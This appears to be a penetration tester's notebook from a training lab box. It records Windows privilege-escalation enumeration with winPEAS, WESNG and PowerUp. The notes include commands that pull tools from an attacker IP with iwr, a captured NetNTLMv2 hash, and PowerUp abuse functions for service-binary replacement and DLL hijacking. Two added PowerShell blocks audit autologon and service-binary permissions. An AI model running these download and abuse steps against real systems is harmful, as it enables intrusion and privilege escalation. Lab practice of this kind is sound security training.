PEAS


Conducting an automated enumeration after performing a manual enumeration

PS C:\xampp\htdocs\blog> mkdir C:\tmp ; cd C:\tmp ; iwr -Uri http://192.168.45.249/winPEASany.exe -OutFile C:\tmp\winPEASany.exe
 
    Directory: C:\
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         4/18/2025  12:35 PM                tmp

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
    COMPUTERNAME: MIKE-PC
    PSExecutionPolicyPreference: Bypass
    HOMEPATH: \Users\Mike
    LOCALAPPDATA: C:\Users\Mike\AppData\Local
    PSModulePath: C:\Users\Mike\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\Mike\AppData\Local\Microsoft\WindowsApps;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\MIKE-PC
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    SESSIONNAME: Console
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    USERPROFILE: C:\Users\Mike
    AP_PARENT_PID: 6108
    APPDATA: C:\Users\Mike\AppData\Roaming
    PROCESSOR_REVISION: 0101
    USERNAME: Mike
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\Mike\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: MIKE-PC
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\Mike\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\Mike\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: MIKE-PC
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A


PowerShell


PS C:\tmp> cat C:\Users\Mike\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Restart-Computer

NTLM


Mike::MIKE-PC:1122334455667788:6abd2ff4f31c852f7d0cfa77ae15c477:0101000000000000a4c0d23399b0db01ff3e5be0f958ca6b0000000008003000300000000000000000000000002000005745f0b31ec1924f045f0bc19ce18ddc9bbb8d3fd6dce763e75f3e1f7c01d0470a00100000000000000000000000000000000000090000000000000000000000

.NET


Token Privileges (mike)


Enumerated

RDP Session


AutoLogon


PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    LastLogOffEndTimePerfCounter    REG_QWORD    0x3387c2fe7
    ShutdownFlags    REG_DWORD    0x80000027
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    DisableCad    REG_DWORD    0x1
    DisableLockWorkstation    REG_DWORD    0x0
    EnableFirstLogonAnimation    REG_DWORD    0x1
    AutoLogonSID    REG_SZ    S-1-5-21-2619112490-2635448554-1147358759-1002
    LastUsedUsername    REG_SZ    Mike
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    Mike
    DefaultDomainName    REG_SZ    DESKTOP-8OB2COP
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
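The key queried above has AutoAdminLogon set to 1 and a DefaultUserName, but no DefaultPassword value. The PowerShell below is an added example, not from the original notes; it assumes an elevated session and the Winlogon key path shown above, reports where the autologon credential is stored, and includes a helper to turn autologon off.

```powershell
# Added example, not part of the original notes: audit the Winlogon autologon
# settings queried above and optionally turn them off.
# Assumptions: elevated PowerShell session; key path as shown in the reg query.
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonExposure {
    $wl = Get-ItemProperty -Path $WinlogonKey
    $enabled = ($wl.AutoAdminLogon -eq '1')
    # A DefaultPassword registry value is cleartext and readable by every local
    # user; PowerUp's "Registry Autologons" check reads exactly this value.
    $regPw = $null -ne $wl.PSObject.Properties['DefaultPassword']
    [pscustomobject]@{
        AutoAdminLogon      = $enabled
        DefaultDomainName   = $wl.DefaultDomainName
        DefaultUserName     = $wl.DefaultUserName
        AutoLogonSID        = $wl.AutoLogonSID
        PasswordInRegistry  = $regPw
        # Autologon on but no DefaultPassword value (the case above): Winlogon
        # takes the password from the LSA secret named DefaultPassword, which
        # SYSTEM can read, so any local administrator can still recover it.
        PasswordInLsaSecret = ($enabled -and -not $regPw)
    }
}

function Disable-AutoLogon {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    if (-not $PSCmdlet.ShouldProcess($WinlogonKey, 'Disable AutoAdminLogon and remove stored credential')) {
        return
    }
    Set-ItemProperty -Path $WinlogonKey -Name AutoAdminLogon -Value '0' -Type String
    foreach ($name in 'DefaultPassword', 'AltDefaultPassword', 'AutoLogonCount') {
        Remove-ItemProperty -Path $WinlogonKey -Name $name -ErrorAction SilentlyContinue
    }
    # The LSA DefaultPassword secret is not touched by these registry changes;
    # clear it with the Sysinternals Autologon utility (Disable) or LsaStorePrivateData.
}

Get-AutoLogonExposure | Format-List
```

Run `Disable-AutoLogon -WhatIf` first to see what would change before applying it.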

Processes


Modifiable Services


Interesting Files


WESNG


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash 
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 21H2 for x64-based Systems
    - Generation: 10
    - Build: 19044
    - Version: 21H2
    - Architecture: x64-based
    - Installed hotfixes (8): KB5012117, KB4562830, KB4580325, KB5003791, KB5012599, KB5011352, KB5011651, KB5005699
[+] Loading definitions
    - Creation date of definitions: 20250418
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows 10 Version 21H2 for x64-based Systems
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
 
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows 10 Version 21H2 for x64-based Systems
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
 
[-] Missing patches: 1
    - KB: patches 2 vulnerabilities
[I] KB with the most recent release date
    - ID: KB
    - Release date: 20250415
[+] Done. Displaying 2 of the 774 vulnerabilities found.

PowerUp.ps1


PS C:\tmp> iwr -Uri http://192.168.45.249/PowerUp.ps1 -OutFile .\PowerUp.ps1
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
 
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files
 
ModifiablePath    : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
IdentityReference : MIKE-PC\Mike
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Mike\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
DefaultDomainName    : DESKTOP-8OB2COP
DefaultUserName      : Mike
DefaultPassword      :
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons
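PowerUp's "Modifiable Service Files" entries above name C:\ as the modifiable file because Authenticated Users may create subdirectories in the drive root (a Windows default); with a quoted image path, what decides the risk is whether the service binary or its own directory is writable. The PowerShell below is an added example, not PowerUp's code or anything from the original notes; it re-checks every service's resolved binary for that, assuming the same standard-user context PowerUp ran in, and ignores Deny rules and generic-right bits, which is enough for triage.

```powershell
# Added example, not part of the original notes: re-check PowerUp's
# "Modifiable Service Files" result against each service's resolved binary.
# Assumptions: same standard user PowerUp ran as; only Allow rules are
# evaluated and generic-right bits are ignored (triage, not a full ACL eval).
$FileWriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$DirWriteMask  = [int][System.Security.AccessControl.FileSystemRights]'WriteData, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    $p = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($p -match '^"([^"]+)"') { return $Matches[1] }    # quoted path, arguments follow
    if ($p -match '^(.+?\.exe)') { return $Matches[1] }   # unquoted: cut at the first .exe
    return ($p -split ' ')[0]
}

function Test-WritableByCurrentUser {
    param([string]$Path, [int]$Mask)
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        if (([int]$rule.FileSystemRights -band $Mask) -ne 0) { return $true }
    }
    return $false
}

function Get-WritableServiceBinary {
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object PathName) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $bin -PathType Leaf)) { continue }
        $dir  = Split-Path -Parent $bin
        $binW = Test-WritableByCurrentUser $bin $FileWriteMask
        $dirW = Test-WritableByCurrentUser $dir $DirWriteMask
        if ($binW -or $dirW) {
            [pscustomobject]@{ Service = $svc.Name; StartName = $svc.StartName
                               Binary = $bin; BinaryWritable = $binW; DirWritable = $dirW }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize
```

A service appears in the output only when its binary or the directory holding it is writable by the current user, which is the condition that makes a service-file finding worth acting on.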